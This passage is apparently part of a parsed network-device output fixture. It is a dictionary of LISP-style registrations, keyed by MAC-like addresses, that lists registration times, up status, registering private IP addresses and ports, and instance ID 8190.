"0023.68ff.4cf1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"0023.68ff.4c4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.4c69/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"0023.68ff.4c7e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"0023.68ff.4e4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"0023.68ff.4fc2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0023.68ff.51e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"0023.68ff.5428/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.5530/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"0024.d6ff.394d/48": {
"last_register": "00:48:59",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"0024.d6ff.8793/48": {
"last_register": "00:37:10",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"0026.73ff.20f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"0050.b6ff.3ed8/48": {
"last_register": "00:22:29",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0050.b6ff.f623/48": {
"last_register": "00:12:54",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"005d.73ff.585b/48": {
"last_register": "1d07h",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"00e0.70ff.56d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"00e0.c9ff.56e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8190,
},
"00e0.c9ff.0375/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"00e0.c9ff.5ace/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"020a.c1ff.3d01/48": {
"last_register": "20:18:31",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"04d4.c4ff.d068/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"04ed.33ff.fd35/48": {
"last_register": "04:08:32",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"04ed.33ff.2488/48": {
"last_register": "00:11:17",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"08d4.6aff.09c9/48": {
"last_register": "00:03:10",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0cd7.46ff.7ba9/48": {
"last_register": "00:04:12",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"0e0b.ccff.4074/48": {
"last_register": "00:05:19",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"10f9.20ff.e77f/48": {
"last_register": "13:52:49",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"1418.77ff.0518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"144f.8aff.4b55/48": {
"last_register": "02:13:47",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"144f.8aff.e6b5/48": {
"last_register": "03:49:10",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"144f.8aff.f1c3/48": {
"last_register": "03:16:36",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"147d.daff.dcde/48": {
"last_register": "00:17:47",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"14ab.c5ff.3b26/48": {
"last_register": "00:08:05",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"160e.f9ff.4ff6/48": {
"last_register": "00:40:05",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"181d.eaff.4d4a/48": {
"last_register": "00:20:58",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"1c1a.dfff.030e/48": {
"last_register": "4d01h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"1c69.7aff.8e57/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"1eb8.08ff.dbe5/48": {
"last_register": "00:04:46",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"2477.03ff.f002/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"28c6.3fff.6282/48": {
"last_register": "00:04:31",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"28c6.3fff.331f/48": {
"last_register": "01:21:47",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"28c6.3fff.348c/48": {
"last_register": "00:48:32",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"309c.23ff.d4cb/48": {
"last_register": "02:44:47",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"30d9.d9ff.4da9/48": {
"last_register": "00:11:26",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"38de.adff.7f68/48": {
"last_register": "00:19:57",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"38f9.d3ff.b38f/48": {
"last_register": "00:18:00",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"38f9.d3ff.fdc3/48": {
"last_register": "01:55:55",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"38f9.d3ff.a4ee/48": {
"last_register": "00:06:10",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"3ce1.a1ff.a6cd/48": {
"last_register": "00:19:25",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"402c.f4ff.66d5/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"4098.adff.2b2a/48": {
"last_register": "00:01:26",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"409c.28ff.df99/48": {
"last_register": "00:29:03",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"40a3.ccff.b7b8/48": {
"last_register": "00:09:49",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"40a3.ccff.8458/48": {
"last_register": "01:53:00",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"40a3.ccff.8a3e/48": {
"last_register": "00:53:59",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"40cb.c0ff.5dc9/48": {
"last_register": "00:37:43",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"4439.c4ff.50c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"444a.dbff.dd5e/48": {
"last_register": "00:22:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"48a4.72ff.dc11/48": {
"last_register": "00:39:28",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8190,
},
"4a64.40ff.62d1/48": {
"last_register": "01:35:41",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"4c32.75ff.7f50/48": {
"last_register": "00:27:16",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"4c74.bfff.6334/48": {
"last_register": "03:32:25",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"50eb.71ff.7d74/48": {
"last_register": "02:59:28",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"5254.ddff.1c7f/48": {
"last_register": "00:04:39",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"5254.ddff.a58a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"54bf.64ff.987d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"54e1.adff.d965/48": {
"last_register": "00:37:34",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"5838.79ff.5224/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"5838.79ff.cfde/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8190,
},
"5838.79ff.c260/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"5838.79ff.c261/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"5838.79ff.c26d/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"5838.79ff.c2ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"5838.79ff.c200/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8190,
},
"5838.79ff.c205/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"5838.79ff.c36a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"5838.79ff.c38e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"5838.79ff.c394/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"5838.79ff.c3bf/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"5838.79ff.c3c2/48": {
"last_register": "3d00h",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"5838.79ff.c3cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"5838.79ff.c44e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"5838.79ff.c4f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"5838.79ff.c583/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"5838.79ff.87a7/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"58d5.0aff.1d00/48": {
"last_register": "00:09:37",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"5e28.44ff.7070/48": {
"last_register": "01:31:15",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"5ea9.78ff.b6e1/48": {
"last_register": "04:44:07",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"60f2.62ff.8285/48": {
"last_register": "03:28:48",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"6805.caff.691b/48": {
"last_register": "6d23h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"6805.caff.8a63/48": {
"last_register": "3d22h",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"6805.caff.3b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"6805.caff.3ccb/48": {
"last_register": "3d22h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"6c0b.84ff.6a31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c0b.84ff.4703/48": {
"last_register": "04:35:36",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"6c0b.84ff.5256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8190,
},
"6c0b.84ff.6629/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c0b.84ff.662a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c3b.e5ff.7e8f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"6c3b.e5ff.01fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"7020.84ff.54d0/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"70f3.95ff.8bd1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"74e5.f9ff.b161/48": {
"last_register": "00:02:29",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"74e5.f9ff.7e5a/48": {
"last_register": "00:09:50",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"787b.8aff.d6b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"7c2a.31ff.13a3/48": {
"last_register": "00:22:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"7c76.35ff.5cc1/48": {
"last_register": "02:06:40",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"8032.53ff.77c8/48": {
"last_register": "00:07:39",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"80ed.2cff.e8b6/48": {
"last_register": "02:07:41",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"84ab.1aff.de14/48": {
"last_register": "00:12:44",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"84fd.d1ff.d2a9/48": {
"last_register": "03:05:27",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"84fd.d1ff.256e/48": {
"last_register": "00:22:43",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"8851.fbff.05b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8190,
},
"8851.fbff.2fcc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8190,
},
"88b1.11ff.789e/48": {
"last_register": "00:55:20",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"8c85.90ff.8e13/48": {
"last_register": "03:53:59",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"8c85.90ff.6b01/48": {
"last_register": "01:27:05",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"8c85.90ff.1927/48": {
"last_register": "00:12:03",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"8c85.90ff.ed0f/48": {
"last_register": "03:38:10",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"8c85.90ff.f1ed/48": {
"last_register": "00:12:00",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"8c85.90ff.a14d/48": {
"last_register": "02:12:34",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"8c85.90ff.05b4/48": {
"last_register": "04:11:05",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"90ac.3fff.1a80/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"90ac.3fff.1aaf/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"90ac.3fff.1acd/48": {
"last_register": "06:59:51",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"90ac.3fff.1ad7/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.1af1/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.1af8/48": {
"last_register": "06:59:59",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.1a03/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"90ac.3fff.1b0a/48": {
"last_register": "06:59:55",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.1b11/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.1b4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.1b5f/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"90ac.3fff.1b6b/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.1b78/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"90ac.3fff.1b79/48": {
"last_register": "06:59:48",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.1b7d/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8190,
},
"90ac.3fff.2ca6/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.2cb0/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.2d36/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2d7e/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"90ac.3fff.2d7f/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.2d80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d83/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2d88/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2d98/48": {
"last_register": "06:59:55",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d9b/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2da5/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"90ac.3fff.2da6/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"90ac.3fff.2da9/48": {
"last_register": "06:59:52",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2daa/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2db0/48": {
"last_register": "06:59:59",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2dbf/48": {
"last_register": "06:59:53",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8190,
},
"90ac.3fff.2dc2/48": {
"last_register": "06:59:45",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2df7/48": {
"last_register": "06:59:53",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"90ac.3fff.2d03/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"90ac.3fff.2483/48": {
"last_register": "05:26:35",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.2485/48": {
"last_register": "06:59:46",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.2486/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.248d/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.248e/48": {
"last_register": "06:59:56",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"90ac.3fff.2491/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"90ac.3fff.2494/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.2496/48": {
"last_register": "06:59:54",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.249c/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.249e/48": {
"last_register": "06:59:41",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8190,
},
"90ac.3fff.249f/48": {
"last_register": "06:59:56",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"90ac.3fff.24b4/48": {
"last_register": "06:59:50",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.24c3/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.24c9/48": {
"last_register": "06:59:48",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.24d2/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.24d3/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.2401/48": {
"last_register": "06:59:49",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8190,
},
"90ac.3fff.2407/48": {
"last_register": "06:59:51",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.2409/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"90ac.3fff.254f/48": {
"last_register": "06:59:57",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.258c/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"90ac.3fff.268b/48": {
"last_register": "06:59:43",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90ac.3fff.2692/48": {
"last_register": "06:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"90ac.3fff.26aa/48": {
"last_register": "06:59:47",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"90ac.3fff.26b0/48": {
"last_register": "06:59:44",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8190,
},
"90ac.3fff.61f2/48": {
"last_register": "06:59:42",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"90e2.baff.41ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"90e2.baff.648b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"92b7.daff.501e/48": {
"last_register": "00:23:05",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"94e6.f7ff.289b/48": {
"last_register": "00:37:05",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"94e6.f7ff.10cd/48": {
"last_register": "00:23:48",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"983b.8fff.1e2b/48": {
"last_register": "00:14:28",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"a408.eaff.b6f3/48": {
"last_register": "00:27:37",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"a434.d9ff.75a2/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"a483.e7ff.1a54/48": {
"last_register": "03:42:46",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"a483.e7ff.abee/48": {
"last_register": "01:31:25",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"a860.b6ff.78ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8190,
},
"a86d.aaff.87af/48": {
"last_register": "00:35:07",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"aaf8.e8ff.94d6/48": {
"last_register": "00:14:37",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"aced.5cff.1dd7/48": {
"last_register": "01:16:19",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"b46b.fcff.a998/48": {
"last_register": "01:25:30",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"b808.cfff.ce97/48": {
"last_register": "01:51:25",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"b841.a4ff.827d/48": {
"last_register": "00:01:01",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"b863.4dff.a4f4/48": {
"last_register": "00:06:37",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"b8d7.afff.46a9/48": {
"last_register": "00:14:16",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"b8d7.afff.0fe0/48": {
"last_register": "00:00:53",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"b8d7.afff.e3fd/48": {
"last_register": "00:54:37",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"bc98.dfff.39e9/48": {
"last_register": "02:45:15",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"bca8.a6ff.326b/48": {
"last_register": "01:21:10",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"c6c5.1bff.f5a2/48": {
"last_register": "01:59:52",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"ca8e.82ff.6e1d/48": {
"last_register": "02:36:33",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
